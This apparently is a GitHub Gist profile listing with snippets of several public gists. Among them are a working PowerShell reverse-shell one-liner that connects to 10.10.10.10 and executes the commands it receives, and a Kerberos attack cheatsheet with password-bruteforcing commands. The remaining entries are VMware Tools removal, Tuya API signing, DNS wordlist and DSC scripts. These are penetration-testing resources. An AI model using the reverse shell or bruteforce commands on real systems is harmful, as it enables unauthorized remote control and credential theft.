Skip to content

Instantly share code, notes, and snippets.

View bobalob's full-sized avatar

Dave Hall bobalob

13 followers · 9 following
View GitHub Profile
@cnibbler
cnibbler / powershell_reverse_shell.ps1
Last active May 18, 2023 17:54 — forked from egre55/powershell_reverse_shell.ps1
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ('. {' + $data + '} *>&1') | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@broestls
broestls / Remove_VMwareTools.ps1
Last active November 19, 2025 13:13
Force removal of VMware Tools, Program Files, and Windows Services
# This script will manually rip out all VMware Tools registry entries and files for Windows 2008-2019
# Tested for 2019, 2016, and probably works on 2012 R2 after the 2016 fixes.
# This function pulls out the common ID used for most of the VMware registry entries along with the ID
# associated with the MSI for VMware Tools.
function Get-VMwareToolsInstallerID {
foreach ($item in $(Get-ChildItem Registry::HKEY_CLASSES_ROOT\Installer\Products)) {
If ($item.GetValue('ProductName') -eq 'VMware Tools') {
return @{
reg_id = $item.PSChildName;
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@Jackzmc
Jackzmc / findSCIDbyUsername.js
Last active November 15, 2020 20:07
/*
1. Must be logged on "socialclub.rockstargames.com" domain
2. Paste in dev tools console (CTRL+SHIFT+I)
3. Paste the below code & enter username in prompt
*/
var ID2find = prompt("What is the social club username?");
var req = new XMLHttpRequest();
req.onreadystatechange=function(){
if(req.readyState ===4){
var res = JSON.parse(req.response);
@jhaddix
jhaddix / Testing_Checklist.md
Last active September 22, 2025 03:46 — forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
@bahorn
bahorn / tuya_cloud.py
Created January 31, 2018 20:36
Cloud endpoint
import requests
import hashlib
import time
import uuid
import os
import copy
import json
# Fixed up version of my previous code to work with the Cloud endpoints.
# Hopefully this works.
@bahorn
bahorn / sign.py
Last active November 22, 2025 17:11
Implementation of the Tuya API signing.
import requests
import hashlib
import time
import uuid
import os
import copy
import json
# This is based on my personal implementation but stripped down to only what is
# needed to verify it.
@jhaddix
jhaddix / all.txt
Last active December 14, 2025 18:25
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@jdhitsolutions
jdhitsolutions / Reset-LCM.ps1
Created January 23, 2017 17:52
A DSC configuration to reset the local configuration manager
Param(
[string[]]$Computername = "chi-test02"
)
[DscLocalConfigurationManager()]
Configuration ResetLCM {
Param([string[]]$Computername)